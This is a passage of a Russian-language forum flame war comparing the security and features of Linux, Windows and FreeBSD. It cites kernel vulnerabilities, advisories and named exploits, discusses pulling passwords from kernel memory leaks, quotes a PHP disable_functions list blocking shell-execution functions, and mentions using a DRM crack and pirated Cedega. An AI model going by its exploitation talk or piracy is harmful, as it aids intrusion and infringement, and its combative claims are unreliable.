
если примерно одного времени розлива - то одни и те же.
Если те же, то и дыры те же.
Цитата

^rage^ писал:

ок. ещё раз повторю: ics автоматом ставит на внутреннем интерфейсе адрес 192.168.0.1 В случае двух локальных сетей у нас будет два интерфейса с адресами 192.168.0.1 и 2 подсети с адресами 192.168/24. И неплохо бы произвольный хост из любой локальной сети по любому из каналов.
RAS ставит различные адреса на обоих локальных сетях. У меня сейчас на этой машине, с которой я вам пишу - 2 различные локальных сети. Интерфейс первой - 192.168.10.1, второй - 192.168.74.1.
Если вы сделаете 2 сети с интерфейсами 192.168.0.1 (это параметры RAS, но никак не ICS), то это не правильно, так как если вы отправите пакет допустим к 192.168.0.15, через какой шлюз он отправится?, нельзя же отправлять на один случайный или тем более на оба.
Вы ведь не можете указать при открытии сокета, через какой интерфейс отправлять пакеты, так как не все пользователи должны иметь доступ к таблицам маршрутизации.
Кстати при расшаривании интернет канала через ICS - вы выбираете ras-запись подключения по локальной сети (которая прикреплена к мак адресу сетевой карты), так что потенциально ICS-у без разницы какие там адреса интерфейсов или маски локальных сетей.
Цитата

^rage^ писал:

можно и без grsec. Просто это будет amd64, либо ppc.
Ну PPC это редкость, так что лучше amd64 без использования EVP.
Только вот какая разница под что я предварительно скомпилирую эксплоит, под 32битную или 64битную amd систему.
Для примера возьмём самую последнюю дырку, обнаруженную 4 дня назад в SYSFS. Как видим уязвимы все ядра начиная от 2.6.2 кончая 2.6.16 .1.
Среди коробочных дистрибутивов в которых по умолчанию установлены входящие в эти рамки версии ядра можно выделить
+ S.u.S.E. Linux Enterprise Server 9
+ S.u.S.E. Linux Personal 9.1 x86_64
+ S.u.S.E. Linux Personal 9.1
Как видим и x86-64 и простая ia32 версии уязвимы. Ну и, разумеется, на всех других дистрибутивах, где пользователь обновлял ядра до 2.6.2 - 2.6.16.1 такая уязвимость будет работать независимо от 32 или 64 бит.
Цитата

^rage^ писал:

вы ставите самое свежее, а я предлагаю заведомо дырявые версии.
Да нет, патчи ядра Windows я тоже ставить не буду, поставлю только на модули, типа RPC, на кернел драйверы (всякие там netbios.sys, ntfs.sys, tcpip.sys, ipsec.sys, и прочие),  а также поставлю VR.



Цитата

^rage^ писал:

не работает ваша linuxmsyncex.c
Отлично работает, правда без grsec.
А помимо этого на ту сотню багов в ядре линукса, что я перечислял, думаю ещё много приватных эксплоитов есть.
Цитата

^rage^ писал:

фи. в дебиан - exim, в mandriva - postfix.
Насчёт "по умолчанию" - бред. не стоит выдавать желаемое за действительное. При установке можно выбрать.
Вот большинство хостинг провайдеров и VDS провайдеров выбирают sendmail

Цитата

^rage^ писал:

вы меряли? числа где?
К сожалению я и один из моих знакомых хотели протестировать, но первая же игра (Trackmania Sunrise - любимая игра) просто не стала нормально работать ни под Wine, ни под Cedega.
Так как она защищена StarForce, нужно устанавливать StarForce драйвер, но он никак не хотел работать под wine.
К счастью оказалось, что недавно всё-таки сумели поломать starforce версии 3.4.7* и появился кряк, вырезающий код starforce и распаковывающий бинарник игры Trackmania Sunrise. Дело в том, что версии старфорса 3.4.7* не могли поломать в течении полугода, и я случайно обнаружил, что недавно его всё-таки сломали.
Так вот запустили мы TM Sunrise под Wine с установленным directxwine (http://directxwine.sourceforge.net/). Сразу после видео, которое кстати почему-то не проигралось, должна была появится меню, но вместо неё появились нарезки текстур. Короче говоря не работает TM Sunrise под Wine.

Далее Cedega (shareware), раздобыли мы его забесплатно, решили попробовать не TM Sunrise, а TM Nations (более новая), запустили мы её и ... она начала ругаться на системные требования...
А между прочим в базе поддерживаемых игр TM Nations аж на второй строчке по популярности, а в деталях написано, что она чётко работает. http://transgaming.org/gamesdb/index.mhtml но на форуме все признают, что она не работает под cedega.

Попытались запустить Sims2 - вылетала. Age of Empires 3 - не работает графика. Потом попробывали Sid Meier's Pirates! и о какое счастье, она заработала, но лагала настолько неимоверно, что играть было не возможно.

Кстати говоря, Cedega нормально поддерживает только самые популярные игры, да и то очень малое их количество.
Если начать копаться, то окажется, что многие игры под Cedega, либо работают с графическими багами, либо вешаются во время загрузки, либо вообще не работают.

Ах  да, ко всему прочему Cedega платная, правда как и всё нормальное ПО.
Цитата

^rage^ писал:

фи. в дебиан - exim, в mandriva - postfix.
Насчёт "по умолчанию" - бред. не стоит выдавать желаемое за действительное. При установке можно выбрать.
Ну вот все обычно и выбирают sendmail.
Цитата

^rage^ писал:

ну если линукс такой дырявый, что ж вы:
Цитата

Хренсмаслом писал:
Разумеется, вы включите grsec, а ядро будет такое, что эксплоиты под него окажутся не особо полезны.
Линукс действительно решето, а модуль лишней нагрузки на ЦП под называнием grsec частично защищает его.
Что ж вы не хотите сломать 2k3 с DEP? Тоже самое -)
Цитата

^rage^ писал:

а в freebsd фотоаппараты и мобильники работают?
К сожалению та же плачевная ситуация, что и под linux.
Цитата

^rage^ писал:

аппаратных роутеров не существует. маршрутизация осуществляется только программно
http://www.cisco.com/en/US/products/hw/routers/
Цитата

^rage^ писал:

проверял. не работает.
Значит коряво проверяли.

Linux kernel is prone to a remote denial-of-service vulnerability.

Remote attackers can exploit this to leak kernel memory. Successful exploitation will result in a crash of the kernel, effectively denying service to legitimate users.

Linux kernel versions 2.6.12.5 and prior in the 2.6 series are vulnerable to this issue.
 
Цитата
Хренсмаслом пишет:
Ну и как же ты его собираешься осуществлять? Заставлять пользователя скачивать WMF файл и запускать его?
Т.е. удаленный взлом юзера с помощью показа ему линка в ICQ/mail/мыле уже не считается взломом?

Цитата
Хренсмаслом пишет:
Я например всегда всё запускаю и открываю от guest через runas() и как же этот WMF мне повредит, да никак - ты опять бредишь со своим линуксом в котором сотня дырок за 2006 год.
Речь не об этих сказочках, что какой-то единственный виндузятник запускает своего дырявого IE через runas, речь об абсолютном большинстве пользователей винды, которые используют IE, запуская из-под своей учетной записи и, зачастую, для удобства сидят под админом. Специально для типов, для которых трудно доходит еще раз повторяю: ВПЕРЕД  ПО СВОИМ ЛИНКАМ СМОТРЕТЬ ЗА КАКОЙ ГОД ОНИ PUBLISHED! Ты прогнал по полной насчет сотен баг в 2006 году.

Цитата
Хренсмаслом пишет:
И сказки про NTшный TCP/IP не рассказывай, igmpv3 прекрасно фильтруются любым браундмауэром.
Не ну ты чудовищно скользкий тип - как уж на сковородке вывовачиваешься, рассказывая баяны про включенный по умолчанию ICF во всех версиях XP и W2k3, который защищает машины от дыр в TCP/IP, рассказывая, что чтение kmem это не страшно, что а вот если у рута пароль офигенный ...., но не понимая при этом, что  на твой выпад вполне точно также скользко можно ответить "а я вот фильтрую ICMP и мне пох", "а я использую grsec и мне пох", "NFS мало распространен поэтому мне пох", "локальный шелл получить не возможно поэтому мне пох" и вообще, как ты там про нормальных людей говорил "все зависит от рук, поэтому все дыры на хостах у нормальных админов закрыты, поэтому нормальным людям по барабану все вышеприведнные дыры, которые давно запатчены".
Скользкий тип найдет 999 оправданий удаленных дыр позволяющих выполнение кода через дыры в TCP/IP винды и сервисах, оправдания для идиотской политики выставления всего что только можно  виндой в сеть по умолчанию, промолчит насчет 8 вообще незакрытых дыр в винде,  оправдает 8+ удаленных баг во FreeBSD за последние неск-ко месяцев, в т.ч. переполнение в ядре,  зато наплетет с три короба про Linux, достав 81 багу якобы за 2006 год, 90% которых за 2004 и 2005 годы.

Цитата
Хренсмаслом пишет:
Всё это потенциально возможно, но на практике, как мы с тобой знаем, никто так и смог сделать эксплоит и грош цена этой "уязвимости".
Дырка во фре есть? Есть.  В ядре? В ядре. Удаленная? Удаленная. Возможность выполнения кода допускает? Допускает.  Чего ты мне хочешь доказать? Что _удаленной_ дырки, допускающей выполнение кода с наивысшими привилегиями в святом ядре фри нет или себя успокаиваешь?

Цитата
Хренсмаслом пишет:
Linux Kernel ICMP_Push_Reply RemoteDenial Of Service
Linux Kernel IP6_Input_Finish Remote Denial Of Service
Linux Kernel ICMP_Send Remote Denial Of Service
Linux Kernel Netfilter Ipt_recent Remote Denial of Service
Так если стоит ядро 2.6.8(Debian) или 2.6.9(RHEL) или ядро 2.4.x, которые не подвержено ошибкам в ICMP, то можешь подтереться этими узвимостями. К тому же у нормальных админов ICMP зафильтровано(кроме unreachable и defrag need),  IPv6 очень редко используется, я тут поспрашивал знакомых админов, они говорят, что не используют IPv6. Поэтому не смеши меня, эти ошибки смехотворны.
Вот видишь как точно также можно ловко отмазаться, как это демонстрируешь ты, рассказывая байки про то как ICF защищает с первых версий XP и W2k3 по умолчанию - это неправда, и порты 137-139 и 445 доступны локальной сети по умолчанию(RPC через 445 порт тоже), про то, что WiFi и NFS очень редко используется, поэтому те удаленные дыры во фре незначительны, про то, как все зависит от рук(этой отмазку вообще можно крыть любые дыры: "патчиться нужно чаще"), и что вот де у нормальных админов и пароль рута то серьезный, да еще ограничение на минимальную длину пароля стоит у юзеров и вообще все нормальные виндузятники запускают браузер из-под runas...

Цитата
Хренсмаслом пишет:
А вот во FreeBSD нет ни одной remote дыры -)
Ты дурак или плохо разглядел последние FreeBSD-SA-06:05.80211, FreeBSD-SA-06:10.nfs, FreeBSD-SA-06:13.sendmail, FreeBSD-SA-06:09.openssh, FreeBSD-SA-06:04.ipfw и FreeBSD-SA-06:07.pf?

Цитата
Хренсмаслом пишет:
А минимальная длина и сложность пароля для чего? Хех, всё твоё писание сливается на нет -)
По умолчанию эта фича не активирована.
Я уже понял, что ты любишь передергивать: как поиметь шелл через дырявые скрипты,  так с какого-то фига ты предполагаешь, что safe mode будет не включен и функции exec/shell/passthru не будут запрещены и вебсервер не будет находиться не в jail/chroot без шелла, зато как встает вопрос о том, что утащат хеши и пароли из памяти через дыры в ядре бзди, так тут же начинаются отмазки, что у рута пароль офигенный, а у юзеров ограничение на минимальную длину пароля стоит...  

Цитата
Хренсмаслом пишет:
А ещё есть passthru()
;)
И как показывает практика не запрещены и остальные.
Ну если тебя интересует расшифровка "exec, system, ...",  получай "php_value disable_functions dl,shell_exec,exec,system,passthru,popen,proc_open,proc_nice,proc_get_status,proc_close,proc_terminate,posix_mkfifo", при чем также отключается ссылки на http и ftp ресурсы для fopen и ты можешь долбиться в скрипты, пытаясь получить шелл, хоть до посинения.

Цитата
Хренсмаслом пишет:
На нормальных, но раза в 3 ниже, чем под Windows.
Я результаты патченого wine от ettersoft уже привел, где местами винда отстает от вайна, а ты как обычно "работаешь язычком", не предоставляя аргументов. Cedega, кстати это тоже модифицированный, точенный под игрушки вайн. Wine, к твоему сведениею, не эмулятор, это реализация Win32API под *NIX, которая как показали результаты тестов как Ettersoft, так и команды Wine, которая гоняла чистый wine(кушай аргументы http://wiki.winehq.org/BenchMark-0.9.5) кое-где работает существенно быстрее оригинального WinAPI.

Цитата
Хренсмаслом пишет:
ГГ ну конечно компания Etersoft будет писать что их продукт WINE@Etersoft 1.0 быстрее, дураку понятно что это самореклама для повышения продаж :)
Ну так покажи свои результаты, опровергающие эти и подтверждающие твою брехню про то, что wine работают в три раза медленней чем WinAPI в винде.

Цитата
Хренсмаслом пишет:
Кернел паник из-за запроса mount. Только вот никто nfsd не пользуется, так что подотри носик и рассказывай сказки дальше.
Угу никто не использует, а во фре NFS зачем-то присутвует, аттавизм остался ...
То что ты не используешь ни WiFi ни NFS, еще не означает, что остальные тоже не используют (я использую NFS и людей, которые используют NFS и Wifi на FreeBSD видел не раз), поэтому хватит бредить. Или ты снова мне хочешь доказать, что этой _удаленной_  дырки в ядре фри(NFS remote kernel panic) нет?

Цитата
Хренсмаслом пишет:
Ну а nfsd это вообще не ядро.
Повторяю еще раз для тупых: NFS реализован в ядре, именно поэтому фря позорно падает в кернел панику от эксплоита на NFS. Ты сам то подумай башкой, почему она в панику падает, если ошибка не в ядерном коде была бы! Читай адвайзори:

II.  Problem Description

A part of the NFS server code charged with handling incoming RPC
messages via TCP had an error which, when the server received a
message with a zero-length payload, would cause a NULL pointer
dereference which results in a kernel panic.  The kernel will only
process the RPC messages if a userland nfsd daemon is running.


Перевод для знатока английского: "Часть кода NFS, отвечающая за обработку входящих RPC сообщений через TCP содержит ошибку, которая ведет к разыменованию нулевого указателя при получении сообщения с нулевым пейлоадом, что приводит к панике ядра. Ядро будет обрабатывать RPC сообщения только тогда, когда запущен юзерспейсный nfsd."

Цитата
Хренсмаслом пишет:
Всё что реализовано под линукс - недоделанное, они попытались реализовать как можно больше кодеков, но в Windows klite codec pack их всё равно больше.
Ты их считал и сравнивал или опять пустозвонишь как обычно? Установленный Mplayer  1.0.20060302 умеет, без учета кодеков из пакаджа win32codecs, "91 audio & 206 video codecs". А klite сколько?

Цитата
Хренсмаслом пишет:
А используя гугл скачать нужное ПО - это один момент.
Да, только ты пропустил мимо ушей, что в Linux пакеты не только централизованно устанавливаются, но и обновляются все сразу одной  командой, а ты будешь обновлять 1500 пакетов снова лазя по гуглям, снова качая и устанавливая, а потом еще раз при очередном обновлении, а потом еще раз и еще раз, пока не осенит тебя сознание убогости установки пакетов в винде...

Цитата
Хренсмаслом пишет:
A remote attacker may be able to execute arbitrary code with the
privileges of the user running sendmail, typically root.

Typically – "типично, в том числе" для рута.
Тебе перевести? Удаленный атакующий может выполнить произвольный код с привилегиями пользователя, под которым работает sendmail, обычно это root.

Цитата
Хренсмаслом пишет:
Да и sendmail это не только приложение FreeBSD и уж тем более не ядро.
Большинство линуксятников также используют сендмейл, как стандартную службу отправки. Практически на всех линук-хостингах так.
Сендмайл это неотъемлимая часть базовой системы FreeBSD или ты забыл чем FreeBSD отличается от Linux? Тем отличается, что это не только ядро, как Linux  - это готовая система с интегрированным в базовую систему дырявым sendmail, дырявым sshd, дырявыми ipfw, pf, и дырявыми ядерными WiFi и NFS на борту. :)))
Приведи плз свою статистику по хостингам на Linux, на основании которой ты делаешь такие заявления по поводу sendmail. Sendmail не является MTA по умолчанию в следующих дистрибутивах: Debian, Ubuntu, Mandriva, SuSe, Gentoo, Altlinux и многих других ...

Цитата
Хренсмаслом пишет:
Ты толком то netsh не знаешь, просто красивое слово добавил.
А что касается RRAS - то большинство основных настроек соединения и проколов применяемых к нему доступно в св-вах подключения.
А откуда ты знаешь что я знаю по поводу netsh или просто пальцы в двери не проходят? По всем конкретно заданным вопросам ты слил, значит в предмете не разбираешься. Ты так и не ответил на вопрос "как настроить в WinXP NAT из GUI(ICS), если внутренний интерфейс у машины не 192.168.0.1 и в сети уже присутствует машина с IP 192.168.0.1?"  А настраивается оно стандартными средствами только так: "netsh routing ip nat install", "netsh routing ip nat add int INET full", "netsh routing ip nat add int LAN private". Через GUI , которое якобы заменяет netsh на XP ты хер так настроиш, чтобы не было конфликта с машиной в локалке с адресом 192.168.0.1.
И сморозил ты бред про настройку RRAS в свойствах подключения. К сведению неграмотных виндузятников, которые даже в своей винде не разбираются, рассказываю: гуишные настройки RRAS находятся в оснастке msc, которая(оснастка) недоступна в WIndows XP, о которой и была речь, а доступна только в серверных версиях винды. Такой вот мелкомягкий маркетинг: домохозяйкам не нужны нетривиальные настройки, а если вдруг понадобятся, то они будут обязаны разучивать работу в консоли с netsh.

Цитата
Хренсмаслом пишет:
Если касательно nfs ты признал поражение.
То вот про баг IGMP ты сопротивлялся, а это тебе не IGMPv3, это ICMP, который используется намного чаще, и которые не следует просто так отключать, так что это серьёзнейший удаленный DoS который кладёт туксятник по полной программе.
Не фантазируй, насчет того, что NFS никто не пользуется ты это сам придумал, пытаясь выгородить багу, как и нафантазировал по поводу того,  что все все виндовые хосты прикрыты ICF, поэтому их не затрагивают дыры в TCP/IP.

Цитата
Хренсмаслом пишет:
Угу, которая если бы да кабы совпадут обстоятельство потенциально позволяет получить доступ к определенным блокам памяти.
Только вот никто не научился через неё выдирать пароли, увы, и она бесполезна.
Выслушали отмазку и пошли читать официальное адвайзори:

III. Impact

A local user could create a large file and truncate it while
transferring it to himself, thus obtaining a copy of portions of system
memory to which he would normally not have access.  Such memory might
contain sensitive information, such as portions of the file cache or
terminal buffers.  This information might be directly useful, or it
might be leveraged to obtain elevated privileges in some way.  For
example, a terminal buffer might include a user-entered password.


Практика показывает, что такие баги дают возможность вытащить не только хеши от шелла, но еще и cleartext пароли на базы, данных, куски БД содержащие логины и пароли на те же FTP/SSH/MYSQL хостинга, на форумы, чаты, админки, поэтому ты неправ.

Цитата
Хренсмаслом пишет:
Во-первых shmat старый баг от 2004 года, а экплоита так и не появилось в паблике, может его просто нет? )
Может быть и ты тогда тоже треплешься про наличие у тебя приватного DoS эксплоита на Linux?

Цитата
Хренсмаслом пишет:
Если у тебя сеть мелких или средних размеров, то ISA будет там хорошо работать, и iptables тоже.
Да хреново она работает, я уже назвал недостатки по списку и спрашивал изменилось ли что-то в лучшую сторону.

Цитата
Хренсмаслом пишет:
*  2.5 летне давности(jan 2004)

Ты бы хоть читал внимательно, не jan 2004, а jan 2005, так что намного свежее.
Тут ошибся из--за того, что смотрел CVE-2004, да за 2005, тем не менее все равно не за 2006.

Цитата
Хренсмаслом пишет:
Да нет, как раз таки позволяет выполнять код с правами суперюзера.
Для того, чтобы писать в sysfs нужны права, а прав на запись в /sys у кого-то кроме рута я не наблюдаю.

Цитата
Хренсмаслом пишет:
А это всего 20 из 81 уязвимости, т.е. ты пропустил мимо ушей 61 уязвимость.
Я не пропустил их мимо ушей, я резюмировал их, если это было трудно понять:

Цитата
Гость пишет:
Итого абсолютное большинство уязвимостей - локальные DoS, локальное чтение памяти, много ошибок в конкретных драйверах, которые специфичны для конкретной системы(в виндовых драйверах эти уязвимости вообще не считают), достаточно ошибок эксплуатирумых под рутом, а много вообще баянов 1.5-2.5 летней давности за 2004 и начало 2005 года, так что нечего бредить про сотни баг 2006 года - бОльшая часть ошибок за 2005 год, смотри в Published, а не Updated, ламир. ;)

Ты выдал желаемое за действительное, соврал что все эти ошибки за 2006 год.
Все локальные DoS баги, коих абсолютное большинство - полная ерунда, потому что до шелла еще нужно добраться и локальный DoS просто глуп и бесполезен, потому, что падение сервера приведет к появлению админа, разбору полетов и потере шелла, а вот удаленно из пакости могут и подосить немного - все равно ведь ничего не теряют. До локальных дыр позволяющих поднятие привилегий тоже нужно добраться. Только тупым нужно доказывать, что удаленная уязвимость намного опаснее локальной, а локальная без удаленной - ноль без палочки. Если будет стоять сервер, например, с postfix, vsftpd и openssh и апач без скриптов или без дырявых скриптов, то тебе останется только засунуть локальные уязвимости куда подальше, поскольку они будут бесполезны.

http://www.securityfocus.com/bid/12338 - уязвимость касается только ветки 2.4

http://www.securityfocus.com/bid/16532 - не вижу Debian и RHEL в списке уязвимых

http://www.securityfocus.com/bid/17109 - Linux Kernel IP ID Information Disclosure Weakness = фигня

http://www.securityfocus.com/bid/16925 - касается ядер 2.6.15+, во многих дистрибутивах используются стабильные ядра меньших версий.

Остальную локальную DoS чушь в списке смотреть лениво... кстати ничто не мешает использовать стабильное ядро ветви 2.4, тогда уязвимостей будет раз два и обчелся.

Цитата
Хренсмаслом пишет:
Просто ты домохозяйка в которую тебя превратило решето, т.е. линукс и поэтому не можешь нормально пользоваться ICF.
Неправда, я ведь не использую ОС для домохозяек. :) Только домохозяйки вроде тебя могут расхваливать сетевые средства винды в сравнении с Linux и убогий ICF. А я не могу использовать ICF/ICS по другим причинам, например, ввиду убогости и глюкавости этой связки не говоря уже про угребищные сетевые возможности винды, закрытость кода, сложность и костылизм архитектуры, а вообще хватает гребаного реестра, неимоверной сложности диагностики причин неполадок и раздолбайской политики безопасности по умолчанию.
Кстати, MS RRAS конфликтует с MS ICF из состава WinXP, прямо как MS ISA с MS RRAS. =)))) Не веришь? :) Попробуй настроить работающий NAT на XP средствами netsh при запущенном сервисе ICF. Сам и пользуй это угребище. ))))))

Цитата
Хренсмаслом пишет:
ULOG через сокеты netlink передаёт пакеты специальному даемону, который может выполнять журналирование в различных форматах, короче говоря ULOG - это лишняя нагрузка на ЦП.
По умолчанию все используют LOG.
По умолчанию политика iptables ACCEPT без всякого логгирования, так что ошибка не проявляется в конфигурации по умолчанию. :) С чего ты взял, что все используют логгирование? С тем же успехом заявляю, что все используют просто -j DROP, а некоторые -j ULOG. Кстати, ulogd, не так уж и нагружает систему записью лишь заголовка отброшенного пакета раз в минуту-пару минут, как ты тут баянишь. :)

Цитата
Хренсмаслом пишет:
Да, в отличие от убогого линуксятника у FreeBSD больше функционала, а из-за того, что её писали грамотные люди в ней несравнимо меньше багов, чем в туксятнике.
Давай показывай аналоги kexec, хоть одну журналируемую файловую, LVM, policy routing, аналоги PAX,OpenWall,  SELinux, mempolicy, udev, fuse, аналог mount --bind, kexec, поддержку saa7134, siefs, ...  
Linux пишут грамотные люди, линукс поддерживают серьезные корпорации(IBM, Novell, RedHat, HP, Intel, AMD, Toshiba, SGI, Oracle, ...) и вкладывают в ее развитие много $$$, а во фре только и умеют, что дописывать устаревший и тормозной код, да тырить код из NetBSD/OpenBSD, да фишки из Linux, и все равно эта пионерская тормозная и в последнее время сильно дырявая поделка с кривой лицензией BSDL никому не нужна.
Смотри еще раз, БСДун, в каком месте находится чертик по сравнению с Linux-ом http://www.trinity.su/news/280.htm. Просьба к нормальным пользователям FreeBSD не воспринимать эти слова близко к сердцу.

Цитата
Хренсмаслом пишет:
И насколько крепка каменная крепость FreeBSD с одной своей уязвимостью в kmem().
Да и NT не имеет такого кол-ва багов, как решето линуксятины.
FreeBSD с кучей удаленных дыр, в т.ч. очередной remote root в sendmail, куча _удаленных_ DoS, несколько локальных эксплоитов поднятия привлегий  FreeBSD-SA-05:02.sendfile, FreeBSD-SA-06:06.kmem и FreeBSD-SA-05:08.kmem.
Насчет NT, неужели Blaster, Sasser и многие другие червяки, ломавшие дырявые NT через их дырки - миф? :) Наличие ICF, кстати, не отменяет наличия дыр в TCP/IP MS05-19(удаленное выполнение кода через дыру в TCP/IP или DoS) и IGMPv3, не считая виндовые локальные и удаленные эксплоиты и 8 незакрытых дыр в системе согласно данным Secunia. А ты все сказки рассказываешь...
Ну а по сравнению с пуленепробиваемой Linux-системой с ядром стабильной ветви 2.4 фря, не говоря уже про винду, является однозначно дырявым решетом. :))))
 
Цитата

Интересует более свежее? Ну, например локальный эксплоит bigrip.c помним?
А вообще в любом траке можно почитать... возьмём например security.nnov.ru
Локальные эксплоиты под ядрышко линуксятины:

постой постой виктор фёдорович....про виндовс ты пишешь что у любого нормального виндузятника админа стоит
файрвол который блокирует 0.0.0.0 все порты и всё такое....


так вот под линукс у нормального линукс админа стоит rsbac/selinux +прополис+ pax
 
Меня прёт политика хренасмаслом...он попросту ПРОПУСКАЕТ то на что ответить не может...или то что является действительным фактом...

например глюк в kmem он утверждает твердолобо что это ерунда и он причисляет его тока из за скрипт киддисов...хотя страницой выше ему сказали про хостинги...

далее он стратёжно уклонился от вопроса по поводу подсетей

Цитата

Хренсмаслом пишет:
Если вам нужно просто расшарить интернет (2 канала на 2 различных сети), то это элементарно делается через ICS (например в св-вах подключения), там же выбирается для какой локальной сети расшаривать данное подключение.
да? и даже если сеть 10/8 ?
когда мы включаем ics, на внутреннем интерфейсе автоматом ставится 192.168.0.1
В случае 2х локальных сетей у нас будет 2 интерфейса с адресом 192.168.0.1?
А если нужна балансировка нагрузки на внешние каналы? Или часть пользователей пускать через один внешний канал, а часть - через другой

Цитата


В каждой модели специфичная механика, для работы с которой требуются различные функции, которые записывают в один и тот же формат различные обозначения. Может ваш ufraw и прочтёт формат, но распознать он все обозначения не сможет из-за одного только неверного недокументированного байтика, из-за которого не будет возможности "понять" весь файл.

тоесть проще сказать я не проверял :))))

Цитата

А что касается игрушек. Хех, интересно как это ты в них играешь на 1 fps, которые выдаёт Wine и уж тем более, если там используется DirectX
вчера играл анрил ...не хуже фпс ничем....просто одно дело видеть второе догадыватся)

Цитата
Если ты не покупаешь, а качаешь из интернета (многие, в том числе я, предпочитают именно так и делать), то зачем ты качал гигабайты GNU мусора вместе со своим дистрибутивом?

вы о генто слышали:? 60 метров он весит...нуну...подождём лонгхорна...


Цитата
Не проще ли скачать один K-Lite codec pack под Windows или codec pack от другого производителя и там будет кодеков в десять раз больше, чем прилагается в твоём дистрибутиве линуксятника

emerge win32codecs :)) и вообще кстати о проблемах с дивиксом да наблюдалось у меня такое для експлорера сыпался если заходишь в папку с фильмами) или выбираешь фильм какой то)


Цитата
А вот вы, Гость, получается, знаете Windows ещё хуже, чем домохозяйки.
Так как те команды, что я перечислял под netsh, можно выполнить через различные оснастки гуишного MMC, например IPSEC через secpol.msc

постойте....Вам задали сверху вопрос....по поводу подсетей в ICS .......я не вижу ответа


Цитата
А если включен DEP под Windows - то от твоих эксплоитов толку будет 0
Садись два
http://www.securitylab.ru/analytics/263899.php
между прочим деп далеко не у всех счас есть...(апаратный)

Цитата
Я уже сказал, что Windows могут пользоваться, как профессионалы, так и домохозяйки.
Последние просто не будут использовать 99% возможностей.
И Windows - не полуконсольный гирбид, это у тебя полукривой мозг :)
Windows поддерживает управление большинством функций И через консоль И через гуи.
Но я тебе не виню, ты ведь показал, что знаешь Windows ещё хуже, чем домохозяйка, когда заявил что netsh нельзя заменить гуём, а такие замены есть, и во многом это оснастки MMC.

А одной короткой фразой ответить слабо вместо стольких ненужных фраз....на вопрос который уже задавали...

Цитата

Хренсмаслом пишет:
В случае если, как вы хотели, требуется автоматически переключить какую-либо локальную сеть на другой канал (переключить ICS шару) - это делается скриптом через wsh, и об этом я уже писал выше.

да-да... ping next hop. Но переключаться можно не только по полному падению канала, а когда его загруженность достигает определённой величины, либо задержки/потери выходят за рамки разумного.




кстати почему разговор идет о 2.6 ядрах......почему все забыли про 2.4 ? которые и по сей день на серверах используются



Цитата
Нормальны люди знают, что DCOM, особенно у мелкомягких, это огромная дыра и недоумевают почему M$ выставили DCOM торчать в сеть по умолчанию.
Ты лучше вместо рассказа о том, как винде подставить костыли, расскажи как пользователю, не нуждающемуся в этом "функциональном" RPC, отключить его вообще без ущерба для работоспособности системы и программ и как при установке объяснить тупой винде, чтобы она не ставила этот мусор? Продемонстрируй-ка глубокое знание системы и то, как винда подчиняется профессионалам.

+5

Мы ждём обьяснения...как профессионалы это делают....очень интересно для меня.


Цитата
ак ты там говорил про нормальных людей? У нормальных людей для PHP запрещено выполнение системных команд(запрещены функции shell_exec, exec, system, ...) или стоитт safe mode.
+1

grep safe_mode /etc/httpd/conf/php.ini
safe_mode = On
; then turn on safe_mode_gid.
safe_mode_gid = Off
; When safe_mode is on, UID/GID checks are bypassed when
safe_mode_include_dir =
; When safe_mode is on, only executables located in the safe_mode_exec_dir
safe_mode_exec_dir = /dev/null
safe_mode_allowed_env_vars = PHP_
; protected even if safe_mode_allowed_env_vars is set to allow to change them.
safe_mode_protected_env_vars = LD_LIBRARY_PATH
sql.safe_mode = Off

Цитата
Вперед показывать мне как настроить в WinXP NAT из GUI(ICS), если внутренний интерфейс у машины не 192.168.0.1 и в сети уже присутствует машина с IP 192.168.0.1. Или как в винде XP настроить RRAS из GUI. Tip: это возможно только из netsh.
Я вижу ты только и умеешь как делать пустые заявления. Ты еще не продемонстрировал своих возможностей по отключению RPC без ущерба системе и не продемонстрировал мощных возможностей роутинга стандартными средствами убогой винды(RRAS) так, чтобы занатить трафик от двух сетей на два разных канала одновременно - то что в Linux решается iptables+iproute2, можно задать задачку по настройке шейпинга виндовыми средствами, чтобы окончательно посадить винду с ее "мощным" сетевым стандартным функционалом в лужу
+10

Я уже 12 страницу флейма жду когда уважаемый дон сделает это...но скорее всего дон снова легко пропустит эти месаги....


Цитата
плюс 8 дырок винды по сведениям secunia.org(линк выше) вообще не закрыты.
профессионал......как вы это прокоментируете? игнорированием?
И еще...дон профессионал...прокоментируйте пожалуйста то что виндовс апдейт на линукс перевели))) выше там гдето был пост....я даж не знал о этом))

Цитата
Ну и как же ты его собираешься осуществлять? Заставлять пользователя скачивать WMF файл и запускать его?
зачем..достаточно просто разослать десяток милионов писем спама...


Цитата
На нормальных, фпс но раза в 3 ниже, чем под Windows.
а вы меряли? а ссылочку?)) ничуть не ниже уверяю вас...

Цитата
Если эту "дыру" легко закрыть, о чём я тебе уже несколько раз писал, то вот сотню дыр в решете, т.е. в функциях ядра линукса ты никак не закроешь.
Как профессионал прокоментирует 2.4.х линейку))))

Цитата


Гость писал:

чтобы занатить трафик от двух сетей на два разных канала одновременно - то что в Linux решается iptables+iproute2


В Windows в св-вах соединения канала (ICS), выбираешь любое подключение по локальной сети, для которого будет расшарен данный интернет канал. И делаешь так с обоими соединениями.


ну что ты снова отвечаешь только на то что тебе выгодно? Ведь просят тебя рассказать
Цитата
Вперед показывать мне как настроить в WinXP NAT из GUI(ICS), если внутренний интерфейс у машины не 192.168.0.1 и в сети уже присутствует машина с IP 192.168.0.1
Страницы: Пред. 1 ... 7 8 9 10 11 След.
Читают тему